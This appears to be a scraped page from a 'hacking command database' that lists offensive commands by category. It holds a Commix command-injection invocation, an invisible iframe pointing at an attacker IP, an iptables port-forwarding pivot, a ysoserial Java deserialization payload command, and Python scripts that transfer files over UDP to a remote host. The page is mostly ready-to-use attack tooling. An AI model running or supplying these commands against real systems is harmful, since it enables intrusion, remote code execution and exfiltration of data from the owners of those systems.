KNXSecurity Hacking Database

Hacking Command Database




Data ddedDescriptionCategoryCommands CopyDemo
2017-06-24 17:34:38 Commix abuse exec as per the php shells, nicer than burp repeater! web Demo
/opt/commix/commix.py -u "https://[rip]:443/[resource]?[password]&cmd=1*" --force-ssl 
2017-06-09 08:20:23iframe invisibileweb Demo
<iframe src=http://172.16.5.34:8081/fdos8h49dzUt851 width=1 height=1 style=”visibility:hidden; position:absolute”></iframe> 
2017-06-24 17:32:51 Iptables port forward net Demo
iptables -t nat -A PREROUTING -p tcp -d [ip] --dport [port] -j LOG; iptables -t nat -A PREROUTING -p tcp -d [ip] --dport [port] -j DNAT --to-destination [rhost]:[rport]; iptables -A FORWARD -p tcp -d [ip] --dport [port] -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT 
2017-06-24 17:34:30 YsoSerial code execution web Demo
java -jar ysoserial-0.0.2-all.jar CommonsCollections1 '[command]' > payload.out 
2017-06-09 08:20:23python udp file trasnfershell Demo
# ----- sender.py ------

#!/usr/bin/env python

from socket import *
import sys

s = socket(AF_INET,SOCK_DGRAM)
host =sys.argv[1]
port = 9999
buf =1024
addr = (host,port)

file_name=sys.argv[2]

s.sendto(file_name,addr)

f=open(file_name,"rb")
data = f.read(buf)
while (data):
    if(s.sendto(data,addr)):
        print "sending ..."
        data = f.read(buf)
s.close()
f.close()
# ----- receiver.py -----

#!/usr/bin/env python

from socket import *
import sys
import select

host="0.0.0.0"
port = 9999
s = socket(AF_INET,SOCK_DGRAM)
s.bind((host,port))

addr = (host,port)
buf=1024

data,addr = s.recvfrom(buf)
print "Received File:",data.strip()
f = open(data.strip(),'wb')

data,addr = s.recvfrom(buf)
try:
    while(data):
        f.write(data)
        s.settimeout(2)
        data,addr = s.recvfrom(buf)
except timeout:
    f.close()
    s.close()
    print "File Downloaded"